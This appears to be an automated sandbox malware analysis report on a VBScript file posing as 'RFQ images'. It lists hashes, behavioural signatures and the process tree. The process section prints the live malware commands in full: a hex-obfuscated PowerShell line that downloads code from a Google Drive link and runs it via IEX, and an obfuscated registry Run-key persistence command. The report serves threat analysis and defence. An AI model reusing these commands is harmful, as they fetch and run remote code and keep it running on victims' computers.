Analysis
-
max time kernel: 10s
max time network: 148s
platform: windows10_x64
resource: win10
submitted: 13/07/2020, 05:34

Static task: static1

Behavioral task: behavioral1
Sample: RFQ_IMAGES_Hayyas (Waltham Cross).vbs
Resource: win7v200430
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: RFQ_IMAGES_Hayyas (Waltham Cross).vbs
Resource: win10
0 signatures, 0 seconds
General
-
Target: RFQ_IMAGES_Hayyas (Waltham Cross).vbs
Size: 10KB
MD5: b4d24a672f4a1daa990c11c03db8295e
SHA1: 16b930060de04f72d7f9b735c5c383fbb256e2a4
SHA256: e81b0ab02b19ac2f9e57d1db647377d1449a4f08bb95070b49f81249b44ed43f
SHA512: f4c874f2d194a587b9cf08b3a0d2553e03ca98cf1409d26ccfb970532d2e5d1608d38a3abc32aad35c3d3824d24b5fca7f0407306053a3a24b6f3099a48c99c0
Score: 10/10
Malware Config
Signatures
-
Blacklisted process makes network request 2 IoCs
flow  pid   Process
3     3820  Powershell.exe
5     3820  Powershell.exe
-
Adds Run entry to start application 2 TTPs 1 IoCs
description      ioc                                                                                                                                                                                                                    Process
Set value (str)  \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\RFQ_IMAGES_Hayyas (Waltham Cross).vbs"  Powershell.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description                                                                         pid   pid_target  Process         procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  3820  3900        Powershell.exe  67
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  3612  3900        Powershell.exe  67
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  4004  3900        cmd.exe         67
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
description                           pid   Process
Token: SeDebugPrivilege               3612  Powershell.exe
Token: SeDebugPrivilege               3820  Powershell.exe
Token: SeIncreaseQuotaPrivilege       3820  Powershell.exe
Token: SeSecurityPrivilege            3820  Powershell.exe
Token: SeTakeOwnershipPrivilege       3820  Powershell.exe
Token: SeLoadDriverPrivilege          3820  Powershell.exe
Token: SeSystemProfilePrivilege       3820  Powershell.exe
Token: SeSystemtimePrivilege          3820  Powershell.exe
Token: SeProfSingleProcessPrivilege   3820  Powershell.exe
Token: SeIncBasePriorityPrivilege     3820  Powershell.exe
Token: SeCreatePagefilePrivilege      3820  Powershell.exe
Token: SeBackupPrivilege              3820  Powershell.exe
Token: SeRestorePrivilege             3820  Powershell.exe
Token: SeShutdownPrivilege            3820  Powershell.exe
Token: SeDebugPrivilege               3820  Powershell.exe
Token: SeSystemEnvironmentPrivilege   3820  Powershell.exe
Token: SeRemoteShutdownPrivilege      3820  Powershell.exe
Token: SeUndockPrivilege              3820  Powershell.exe
Token: SeManageVolumePrivilege        3820  Powershell.exe
Token: 33                             3820  Powershell.exe
Token: 34                             3820  Powershell.exe
Token: 35                             3820  Powershell.exe
Token: 36                             3820  Powershell.exe
Token: SeIncreaseQuotaPrivilege       3820  Powershell.exe
Token: SeSecurityPrivilege            3820  Powershell.exe
Token: SeTakeOwnershipPrivilege       3820  Powershell.exe
Token: SeLoadDriverPrivilege          3820  Powershell.exe
Token: SeSystemProfilePrivilege       3820  Powershell.exe
Token: SeSystemtimePrivilege          3820  Powershell.exe
Token: SeProfSingleProcessPrivilege   3820  Powershell.exe
Token: SeIncBasePriorityPrivilege     3820  Powershell.exe
Token: SeCreatePagefilePrivilege      3820  Powershell.exe
Token: SeBackupPrivilege              3820  Powershell.exe
Token: SeRestorePrivilege             3820  Powershell.exe
Token: SeShutdownPrivilege            3820  Powershell.exe
Token: SeDebugPrivilege               3820  Powershell.exe
Token: SeSystemEnvironmentPrivilege   3820  Powershell.exe
Token: SeRemoteShutdownPrivilege      3820  Powershell.exe
Token: SeUndockPrivilege              3820  Powershell.exe
Token: SeManageVolumePrivilege        3820  Powershell.exe
Token: 33                             3820  Powershell.exe
Token: 34                             3820  Powershell.exe
Token: 35                             3820  Powershell.exe
Token: 36                             3820  Powershell.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid   Process
3820  Powershell.exe
3612  Powershell.exe
3820  Powershell.exe
3612  Powershell.exe
3820  Powershell.exe
3612  Powershell.exe
Processes
-
C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_IMAGES_Hayyas (Waltham Cross).vbs"
PID: 344
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Command line: Powershell -ExecutionPolicy Bypass $eVsOKCmwhwGIfbAcCemV='24 54 62 6F 6E 65 3D 27 2A 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 27 2C 27 49 27 29 3B 73 61 6C 20 4D 20 24 54 62 6F 6E 65 3B 64 6F 20 7B 24 70 69 6E 67 20 3D 20 74 65 73 74 2D 63 6F 6E 6E 65 63 74 69 6F 6E 20 2D 63 6F 6D 70 20 67 6F 6F 67 6C 65 2E 63 6F 6D 20 2D 63 6F 75 6E 74 20 31 20 2D 51 75 69 65 74 7D 20 75 6E 74 69 6C 20 28 24 70 69 6E 67 29 3B 24 70 32 32 20 3D 20 5B 45 6E 75 6D 5D 3A 3A 54 6F 4F 62 6A 65 63 74 28 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 54 79 70 65 5D 2C 20 33 30 37 32 29 3B 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 72 76 69 63 65 50 6F 69 6E 74 4D 61 6E 61 67 65 72 5D 3A 3A 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 20 3D 20 24 70 32 32 3B 24 6D 76 3D 27 28 4E 27 2B 27 65 77 27 2B 27 2D 4F 27 2B 27 62 27 2B 27 6A 65 27 2B 27 63 27 2B 27 74 20 27 2B 20 27 4E 65 27 2B 27 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 27 2B 27 6C 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 61 27 2B 27 64 27 2B 27 53 27 2B 27 74 72 27 2B 27 69 6E 67 28 27 27 68 74 74 70 73 3A 2F 2F 64 72 69 76 65 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 75 2F 30 2F 75 63 3F 69 64 3D 31 38 32 55 76 69 43 45 66 6C 79 48 70 57 36 71 56 68 68 68 61 45 33 59 46 48 72 48 4E 6D 52 66 6B 26 65 78 70 6F 72 74 3D 64 6F 77 6E 6C 6F 61 64 27 27 29 27 7C 49 60 45 60 58 3B 24 61 73 63 69 69 43 68 61 72 73 3D 20 24 6D 76 20 2D 73 70 6C 69 74 20 27 2D 27 20 7C 46 6F 72 45 61 63 68 2D 4F 62 6A 65 63 74 20 7B 5B 63 68 61 72 5D 5B 62 79 74 65 5D 22 30 78 24 5F 22 7D 3B 24 61 73 63 69 69 53 74 72 69 6E 67 3D 20 24 61 73 63 69 69 43 68 61 72 73 20 2D 6A 6F 69 6E 20 27 27 7C 4D';$jm=$eVsOKCmwhwGIfbAcCemV.Split(' ') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID: 3820
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Command line: Powershell $g='C:\Users\Admin\AppData\Local\Microsoft\RFQ_IMAGES_Hayyas (Waltham Cross).vbs';'Set-Item -Path HKCU:\Software\Micro@@oft\Window@@\CurrentVer@@ion\Run -Value $g'.replace('@@','s') |I`E`X
- Adds Run entry to start application
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID: 3612
-
C:\Windows\system32\cmd.exe
Command line: cmd /c copy "C:\Users\Admin\AppData\Local\Temp\RFQ_IMAGES_Hayyas (Waltham Cross).vbs" "C:\Users\Admin\AppData\Local\Microsoft\" /Y
- Process spawned unexpected child process
PID: 4004